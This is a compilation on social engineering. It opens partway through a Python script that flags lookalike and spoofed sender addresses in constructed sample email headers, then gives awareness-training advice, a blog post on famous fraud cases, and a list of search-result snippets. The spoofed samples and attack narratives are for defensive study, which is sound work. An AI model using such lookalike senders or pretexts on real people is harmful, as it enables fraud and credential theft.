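    if name_key in EXECUTIVES and EXECUTIVES[name_key] != addr:
        findings.append("executive_display_name_mismatch")
    return findings


# Constructed sample headers standing in for a day's inbound mail.
SAMPLE_HEADERS = [
    "Jane Doe <ceo@example.com>",                        # genuine
    "Accounts Payable <ap@example.com>",                 # genuine
    "Jane Doe <jane.doe@examp1e.com>",                   # digit 1 for l, plus CEO name
    "Jane Doe <j.doe@freemail.test>",                    # CEO name on a free mailbox
    "Procurement <bids@example.com.bid-portal.test>",    # trusted name embedded
    "IT Support <helpdesk@exampIe.com>",                 # capital I for l
]


def scan(headers):
    """Map each header to its findings, dropping the clean ones."""
    return {h: f for h in headers if (f := classify_sender(h))}


if __name__ == "__main__":
    for header, findings in scan(SAMPLE_HEADERS).items():
        print(f"{header!r}: {', '.join(findings)}")
```

A hit is a reason to route the message for a second verification step (the "three times" rule above), not proof of fraud on its own; legitimate partner domains that happen to be one edit away need an allow list.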

How to protect against social engineering attacks

Social engineering is successful because the technique manipulates our everyday actions. This makes it difficult for employees to spot that they are part of a social engineering attack.

Social engineering needs to be part of the conversation around security awareness, and security policies should reflect this. However, there are practical ways to ensure that employees are up to speed with the tricks that social engineering scammers play:

Make social engineering part of your security culture:

  • Engage staff in regular updates on social engineering and how it works.
  • Make sure that social engineering is part of your regular Security Awareness Training.
  • Include social engineering in security awareness month posters and send newsletters to staff about the issues caused by social engineering.

Deploy phishing simulations: use an advanced simulated phishing platform to train staff on what phishing emails look like and to test their response to a phishing email. Tailor these emails to different roles in your organisation and base the simulations on known tactics used by scammers.

Penetration test your company and staff: set up various test scenarios to see how well staff respond to potential social engineering attempts. This can include tests to see how easy (or hard) it is to gain entry to the building.

Also, test out staff and their response to unknown individuals. For example, pose testers as cleaners or contractors and see how far they can get in extracting information about your company or asking for access to a computer.



ODS – Cybersecurity


The Most Famous Cases of Social Engineering


  • March 28, 2017
  • Cyber security advice

In 2007, one of the most expensive security systems in the world was breached. To do this, no weapons, violence or electronic devices were needed. A man took 28 million dollars in diamonds from the ABN AMRO bank, based in Belgium, simply by being a charming person. Obviously, this kind of weapon can’t be bought.

The man, who called himself Carlos Héctor Flomenbaum, had an Argentinian passport which had been stolen in Israel. With his new identity, he gained the confidence of the bank’s employees over the course of a year. While painting himself as a successful businessman, the thief made friends with the bank workers by giving them boxes of chocolates. One day, they gave him access to the safe deposit boxes, which contained gems valued at 120,000 carats. It thus became one of the biggest robberies ever committed by a single person.

The moral of this story is simple: no matter which kind of technology is provided, or how expensive it is, while the human factor is operating, the system is still vulnerable .

The user is the weakest link in security

The previous chronicle is a good starting point for talking about social engineering: a set of psychological techniques and social skills which, used consciously and with premeditation, allow data to be stolen. What a social engineer does with the information gathered has no limits, although that no longer belongs to social engineering. That is why, as far as the computing world is concerned, it is possible that a social engineer never touches a computer or accesses any system.

In some cases, a social engineer does not have to gain the confidence of the victims or manipulate them, as data can be obtained simply by paying attention to information that is in plain view of everybody. It could be a post-it on a desk, notes in a notebook, messages that appear on a mobile screen, or even data found in the trash (a method known as trashing). In other words, a social engineer can get data without applying any pressure on people. In these cases, we would not be talking about a scam technique, but about taking advantage of carelessness.

In the previous example, it is clear that the goal of the robbery was the gems, but it also shows that the most important asset of any company is still information. The thief would possibly not have known things like where the diamonds were if the employees had not given him this information. This is the main reason why businesses should invest in system protection, but also in training their workers to prevent what could happen.

We should not forget that social engineering is still one of the most used techniques among cybercriminals. This is not surprising, as they have earned a billion dollars in the last two years by stealing from a hundred banks.

Social engineering information

The following cases demonstrate to us how the human factor can influence a company’s profits , and also, how it could affect the state of the main markets. You will see two examples that are worth bearing in mind when a company decides to invest in improving its computer security.

Ubiquiti Networks case and reverse social engineering

Ubiquiti Networks is an American provider of high-performance networks for businesses. In 2015 it was hit by a cyberattack that cost it 39.1 million dollars. To achieve this, cybercriminals wrote e-mails introducing themselves as executive members of the company and asked employees in the finance department to transfer large amounts of money to a particular bank account controlled by the cybercriminals.

This social engineering technique takes advantage of certain human weaknesses, like being helpful, since this could be recognized by superiors. Also, there are a lot of people who are incapable of refusing to do something that, considered coldly, could be harmful.

No one entered the computer systems of Ubiquiti Networks and no data was stolen. In this case, the security breach was the employees: they lacked cybersecurity training and were unaware of the procedures needed to face these kinds of fraud.

The influence of a fake tweet in the world economy

There are people who have probably forgotten the next case. In April 2013 the Associated Press Twitter account published a tweet which damaged the world economy for a short time:

Social engineering tweet

At that time, the social network didn’t have two-factor authentication for logging on. The Syrian Electronic Army, the group who claimed responsibility for the attack, took over the Twitter account by sending a phishing e-mail to some members of the Associated Press. Someone took the bait and gave the login information to the hackers. In the next image, you will see the phishing e-mail which was sent to the Associated Press:

Social engineering phishing email

The outcome is well known: the White House denied the tweet, and the Associated Press account was temporarily suspended until the staff members restored control. The markets soon recovered their original levels.

Social engineering White House tweet

This situation shows us how weak we are in the face of this kind of cyberattack, and as a consequence, how vulnerable companies and organizations of any size are. This time it was the Associated Press, but tomorrow it may be any business or institution whose account sends harmful messages on social networks, damaging its reputation and hence the confidence of its customers and investors.

The relevance of taking action and reporting

In a TED Talk, Caleb Barlow, vice president at IBM Security, urges companies all over the world to fight cybercrime the same way action protocols are carried out in a public health crisis. As we saw in the 2009 flu pandemic and the Zika virus, governments and organizations of every country instantly shared information about the number of people affected and how these viruses were spreading.

This pathway is the opposite of what is being done today in relation to computer attacks. Looking at the number of daily cyberattacks, we don’t have enough data about how many companies have been breached. The reason is fear: this information could impact their name and also their finances. “If we do not share it [information], then we are part of the problem”, says Barlow.


  11. What is Social Engineering? Definition + Attack Examples

    Social Engineering, in the context of cybersecurity, is the process of tricking people into divulging private information that can be useful in a cyberattack. There are many different types of social engineering attacks. Some forms of social engineering are convincing emails or text messages infected with links leading to malicious websites.

  12. Social Engineering Attacks on Facebook

    Cyber Criminals use Facebook as the main target for social engineering attacks because of its high number of users and popularity. Originality/Value: This paper study gives a brief overview of ...

  13. Social Engineering: Definition, Examples & Prevention Tips

    The more recent examples of social engineering include: The sale of the Eiffel Tower for metal scraps in 1925. The stealing of $10M from Security Pacific National Bank over the phone in the 1970s. 419 scam: cybercriminals request a target to make a small payment in return for a future share in a larger amount of money.

  14. The "Pizza" method

    The "Pizza" method - a social engineering Case Study. 'Eight pizza delivery boxes with 30% discount and a free gadget for the computer'. Hackers posing as pizza delivery carried on a successful social engineering attack on the Warsaw branch office of a well-known international corporation. In a few minutes, they hacked the IT system ...

  15. PDF Unintentional Insider Threats: Social Engineering

    5.2 Characterization of Case Study Data 30 ... 5.2.2 Discussion and Implications of Sample Data Obtained to Date 31 6 Conceptual Models for Social Engineering Incidents 33 6.1 Attack Progression Analysis 33. CMU/SEI-2013-TN-024 | ii ... social engineering exploits in the scientific literature as well as real cases reported in court

  16. 5 Examples Of Social Engineering Attacks

    Examples of social engineering are regularly in the press, but here are five to give you a flavour of how social engineering works: Marriott Hotel: a hacking group used social engineering tactics to steal 20 GB of personal and financial data from a Marriott Hotel. The hackers tricked a Marriott Hotel associate into giving the hacking gang ...

  17. Passive and Active Reconnaissance: A Social Engineering Case Study

    Love scams, online scams and how absurd as it may seem, still causes people to lose their money. This issue happens because some people are still susceptible to social engineering. Our investigation attempts to find out how people could be exploited for this type of social engineering attack on social media. Social engineering could be categorized into passive and active reconnaissance. Our ...

  18. 9 Examples of Social Engineering Attacks

    All examples of social engineering take advantage of human nature, such as the willingness to trust others, to trick individuals into divulging sensitive information. Despite its prevalence, social engineering can be challenging to distill into a single formula. It's one of the reasons 82% of data breaches involve the human element. Social engineering has become the backbone of many cyber ...

  19. Social engineering attack examples, templates and scenarios

    The social engineering attack templates are converted to social engineering attack scenarios by populating the template with both subjects and objects from real-world examples whilst still maintaining the detailed flow of the attack as provided in the template. Furthermore, this paper illustrates how the social engineering attack scenarios are ...

  20. Social Engineering Examples: Don't Fall Victim! (2024 Guide)

    The social engineering examples show that these attacks are based on the attacker targeting to gain the victim's trust. Therefore, paying attention to emails is critical, double-check attachments and links, and avoid urgent orders involving money. ... Case Studies and Downloads; Events; A MESSAGE FROM STAN. Linkedin-in Facebook-f Twitter ...

  21. Social Engineering Case Studies

    In this tutorial we use recent and applicable real-world examples of successful social engineering attacks to better understand not only the tactics used by genuine attackers, but also how to mitigate this particular set of risks. ... "In all these case studies, social engineering had been the initial method by which a malicious actor has ...

  22. Understanding and deciphering of social engineering attack scenarios

    In this article, we aim to review and synthesize a body of knowledge (rationale and motivation of social engineers). The study aims to: (a) understand the rationale of social engineers; (b) capture the knowledge of SE attacks and extract important information from the sources; (c) propose an activity for counteracting SE attacks, and how it can ...

  23. The Most Famous Cases of Social Engineering

    You will see two examples that are worth bearing in mind when a company decides to invest in improving its computer security. Ubiquiti Networks case and reverse social engineering. The Ubiquiti Networks is an American service provider of high-performance networks for businesses. In 2015 it was hit by a cyberattack that made it lose 39.1 million ...

  24. PDF 7th edition Common Reference Examples Guide

    Horvath-Plyman, M. (2018). Social media and the college student journey: An examination of how social media use impacts social capital and affects college choice, access, and transition (Publication No. 10937367) [Doctoral dissertation, New York University]. ProQuest Dissertations and Theses Global.